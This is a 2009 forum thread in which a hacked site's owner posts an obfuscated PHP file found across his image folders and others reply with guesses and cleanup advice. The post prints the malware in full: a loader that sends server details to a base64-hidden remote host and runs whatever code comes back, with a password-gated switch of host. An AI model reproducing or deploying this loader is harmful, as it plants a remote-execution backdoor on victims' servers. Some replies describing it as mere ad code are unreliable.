what hacker do with this php script

[vgnheart]

My image hosting site got hacked. the hacker placed .htaccess files and some php files with random name. he insterted the files in all most every image folder. so i would like to know what is the output of the php script

Code: 

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="72951d9f890543cc69aa7aa29a5b0609") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

upon execution of the php file, i am getting only blank page. I think he is getting info about my site. some pls explain me

vgnheart Reviewed by vgnheart on 10th Jun 2009. what hacker do with this php script My image hosting site got hacked. the hacker placed .htaccess files and some php files with random name. he insterted the files in all most every image folder. so i would like to know what is the output of the php script <? Rating: 5

[JmZ]

Seen this before.
Isn't a shell, it's a piece of ad code which shows a malicious virus-infected ad.

[lenney]

ive also seen this before and some 1 decoded it and it was a website link with a virus

[vgnheart]

i tried opening those files in firefox . I mean files on the server. but only getting blank page. I am not going to take risk , deleting all those files

[User12399]

It a link to other sites which has that virus...just delete them

[Juicy]

Probably an injection into your web code. Try to keep CHMOD settings accurate and dont use buggy scripts.

[wildfire95]

Search milw0rm.com with your script name, if you use scripts, include version. It will tell you any exploits for your script.

[SplitIce]

What script where you using, want to make sure mine isnt vuln.

[JmZ]

I guess you last 3 posters didnt bother reading my post then?
lol

unless that is, you mean "how did it get there". In that case, probably someone with access via an RFU exploit.

[wildfire95]

I think we were under the impresstion that -

If he was exploited once, hell knows how many other shellcodes he has had on his system.